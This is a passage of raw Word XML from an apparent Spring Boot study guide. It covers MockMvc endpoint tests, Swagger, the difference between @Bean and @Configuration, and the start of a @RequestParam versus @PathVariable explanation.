    <w:p w14:paraId="39837724" w14:textId="77777777" w:rsidR="004101E7" w:rsidRPr="002C6305" w:rsidRDefault="004101E7"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T http://localhost:8080/api/message</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="037E676A" w14:textId="77777777" w:rsidR="004101E7" w:rsidRPr="002C6305" w:rsidRDefault="004101E7"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T http://localhost:8080/api/greet/John</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2351FDFD" w14:textId="77777777" w:rsidR="004101E7" w:rsidRPr="002C6305" w:rsidRDefault="004101E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8. (Optional) Add Unit and Integration Tests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B899A65"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f you need to ensure the functionality of your new endpoint, write unit and integration tests using </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>JUnit</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>MockMvc</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08F4D31C"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p>
    <w:p w14:paraId="3353986A"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BootTest</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="290AD9AD"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utoConfigureMockMvc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="204D7A0C"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MyNewControllerTest {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="574FDAAD" w14:textId="77777777" w:rsidR="004101E7" w:rsidRPr="002C6305" w:rsidRDefault="004101E7" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D850128"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628A1AFE"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MockMvc mockMvc;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="673A7CB4" w14:textId="77777777" w:rsidR="004101E7" w:rsidRPr="002C6305" w:rsidRDefault="004101E7" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49CEFDF3"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est</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24F13715"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testGetMessage() throws Exception {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54DAF85E"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mockMvc.perform(get("/api/message"))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F7722E2"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dExpect(status().isOk())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48823827"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dExpect(content().string("Hello, Spring Boot!"));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46B11A57"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134C6435"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74AD0E9B"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lastRenderedPageBreak/>
        <w:t>Explanation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E1649D8"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MockMvc class allows you to perform HTTP requests and assert the response.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="281BAEEC" w14:textId="77777777" w:rsidR="004101E7" w:rsidRPr="002C6305" w:rsidRDefault="004101E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9. (Optional) Document the API Using Swagger</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49126A34"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f your application is a RESTful service, you may want to add API documentation using </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Swagger</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for better usability and discoverability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="628117E4"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p>
    <w:p w14:paraId="0D7E7F37"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dd Swagger dependencies and annotations to document the API automatically.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48E31E59" w14:textId="77777777" w:rsidR="004101E7" w:rsidRPr="002C6305" w:rsidRDefault="004101E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ummary of Steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C100D1B"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reate a controller class</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (or use an existing one).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ED3974F"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efine a method to handle the request</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> with the appropriate HTTP method annotation (e.g., @GetMapping, @PostMapping).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="366064A7"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Handle parameters</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> using @PathVariable, @RequestParam, or @RequestBody as needed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B0221ED"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Write business logic</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (optionally, via a service class).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BDC50FA"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Return a response</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> either directly or using ResponseEntity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E1B2C10"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Test the endpoint</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> using tools like Postman or Swagger.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13761FDB"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Optional)</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Add unit tests and Swagger documentation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35B0D752"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By following these steps, you can easily expose new endpoints in your Spring Boot application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0373C2A8" w14:textId="1A358AB3"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E958C56">
          <v:rect id="_x0000_i2678" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="00DF4D42" w14:textId="0EE167DF" w:rsidR="007D2E6B" w:rsidRPr="00CE4B95" w:rsidRDefault="009D505D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="643" w:name="_Toc196308123"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Difference</w:t>
      </w:r>
      <w:r w:rsidR="004F0738" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> between @Bean and @Configuration</w:t>
      </w:r>
      <w:r w:rsidR="007D2E6B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="643"/>
    </w:p>
    <w:p w14:paraId="59A179C8" w14:textId="6347A8D5" w:rsidR="004101E7" w:rsidRPr="002C6305" w:rsidRDefault="004101E7"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Both @Bean and @Configuration are used in Spring for defining beans, but they serve different purposes and have different scopes of usage.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22C9CD91" w14:textId="77777777" w:rsidR="004101E7" w:rsidRPr="002C6305" w:rsidRDefault="004101E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Bean Annotation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32E005CC"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urpose</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: @Bean is used to define individual beans within a method of a class annotated with @Configuration or any other class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="574B3FF2"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cope</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: It is applied at the method level and the method that returns an object of type T is considered as a bean. The object returned by the @Bean-annotated method will be managed by the Spring container.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CE102C6"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age</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: You typically use @Bean inside a class (which may or may not be annotated with @Configuration) to define a bean that can be injected into other components (e.g., services, controllers).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F345A4B"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p>
    <w:p w14:paraId="7678CC87"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ation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="134B5CB8"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AppConfig {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D30B41E" w14:textId="77777777" w:rsidR="004101E7" w:rsidRPr="002C6305" w:rsidRDefault="004101E7" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="607AC25B"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ean</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="607F06A2"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MyService myService() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="042E4C12"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MyServiceImpl();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F29127F"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65B788AC"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D03161C"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this example, the myService() method is annotated with @Bean, indicating that an instance of MyServiceImpl will be created and managed by the Spring container.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A741208" w14:textId="77777777" w:rsidR="004101E7" w:rsidRPr="002C6305" w:rsidRDefault="004101E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Configuration Annotation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21E478ED"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urpose</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: @Configuration is used to mark a class as a source of bean definitions. It tells Spring that this class will have methods annotated with @Bean that define beans.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54FFE288"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cope</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: It is applied at the class level. A class annotated with @Configuration is a specialized form of @Component and will be automatically registered as a Spring bean by the Spring container.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77A24B5A"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age</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Typically, @Configuration is used to create a configuration class where you define beans using @Bean methods, setting up the overall application context.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2831B4A2"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p>
    <w:p w14:paraId="15EB64ED"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ation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="028B82D0"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AppConfig {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D260735"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76EF4515"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ean</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="543A3CC0"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MyService myService() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="593970FC"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MyServiceImpl();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BB04838"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04CF4990"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1F45DC27"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In this example, the class AppConfig is annotated with @Configuration, which indicates that it will contain @Bean-annotated methods to define beans for the Spring container.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="561B788B" w14:textId="77777777" w:rsidR="004101E7" w:rsidRPr="002C6305" w:rsidRDefault="004101E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68"/>
        <w:gridCol w:w="2788"/>
        <w:gridCol w:w="6148"/>
      </w:tblGrid>
      <w:tr w:rsidR="002C6305" w:rsidRPr="002C6305" w14:paraId="089157B5" w14:textId="77777777" w:rsidTr="004101E7">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="76EC450F" w14:textId="77777777" w:rsidR="004101E7" w:rsidRPr="002C6305" w:rsidRDefault="004101E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Feature</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6122451C" w14:textId="77777777" w:rsidR="004101E7" w:rsidRPr="002C6305" w:rsidRDefault="004101E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Bean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7AC23C54" w14:textId="77777777" w:rsidR="004101E7" w:rsidRPr="002C6305" w:rsidRDefault="004101E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Configuration</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C6305" w:rsidRPr="002C6305" w14:paraId="426243AD" w14:textId="77777777" w:rsidTr="004101E7">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4ADE7187"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urpose</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="52B6196A"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Defines individual beans within a method.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2EF9DB63"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Defines a class that contains bean definitions.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C6305" w:rsidRPr="002C6305" w14:paraId="196525DD" w14:textId="77777777" w:rsidTr="004101E7">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4ECB0E1A"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cope</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5EE8D582"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pplied at the method level.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2553C2CE"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pplied at the class level.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C6305" w:rsidRPr="002C6305" w14:paraId="0A066CD7" w14:textId="77777777" w:rsidTr="004101E7">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="586A5EA2"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age</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="03BD5468"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ed to mark a method as a bean provider.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="115BCE4F"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ed to define a configuration class.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C6305" w:rsidRPr="002C6305" w14:paraId="14891BCD" w14:textId="77777777" w:rsidTr="004101E7">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="338A3A2A"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roxying</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="58E630BA"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Does not automatically proxy methods.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="11E836C0"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an be proxy-enhanced by Spring (i.e., CGLIB proxy) to ensure the beans are correctly scoped in cases of bean method calls within the same configuration class.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C6305" w:rsidRPr="002C6305" w14:paraId="1531AC4D" w14:textId="77777777" w:rsidTr="004101E7">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6AFC35DA"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Functionality</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="68AAD6BE"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an be used in both @Configuration and regular classes.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7CFD1C40"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rimarily used to mark configuration classes that contain @Bean methods.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2DABD2ED" w14:textId="77777777" w:rsidR="004101E7" w:rsidRPr="002C6305" w:rsidRDefault="004101E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ummary:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33C7967B"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Bean is used to define beans within a method and can be applied to any method in a class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AE4B1FF" w14:textId="77777777" w:rsidR="004101E7" w:rsidRPr="002C6305" w:rsidRDefault="004101E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ation is used to indicate a class that provides bean definitions and should be used to mark configuration classes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09BA47D7" w14:textId="26322880"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7E7E467">
          <v:rect id="_x0000_i2679" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="291D5687" w14:textId="105A9356" w:rsidR="00827C49" w:rsidRPr="00CE4B95" w:rsidRDefault="004101E7">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="644" w:name="_Toc196308124"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>D</w:t>
      </w:r>
      <w:r w:rsidR="004F0738" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">ifference between RequestParam and </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidR="004F0738" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>ath</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>V</w:t>
      </w:r>
      <w:r w:rsidR="004F0738" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>ariable? Give me one example with one URL</w:t>
      </w:r>
      <w:r w:rsidR="00827C49" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="644"/>
    </w:p>
    <w:p w14:paraId="7C053926" w14:textId="501150AA" w:rsidR="009910A9" w:rsidRPr="002C6305" w:rsidRDefault="009910A9"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Both @RequestParam and @PathVariable are used in Spring MVC to handle incoming HTTP request parameters. However, they differ in how they extract data from the request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F6E71CB"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RequestParam</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B1076D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urpose</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: @RequestParam is used to extract query parameters from the URL or form data. These are typically parameters that are passed in the URL's query string (after ?).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41AC57A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e case</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: It is used when you want to capture optional or required query parameters passed as key-value pairs in the URL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BAB35AD"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 URL</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: http://localhost:8080/api/user?id=123&amp;name=John</w:t>
      </w:r>
    </w:p>
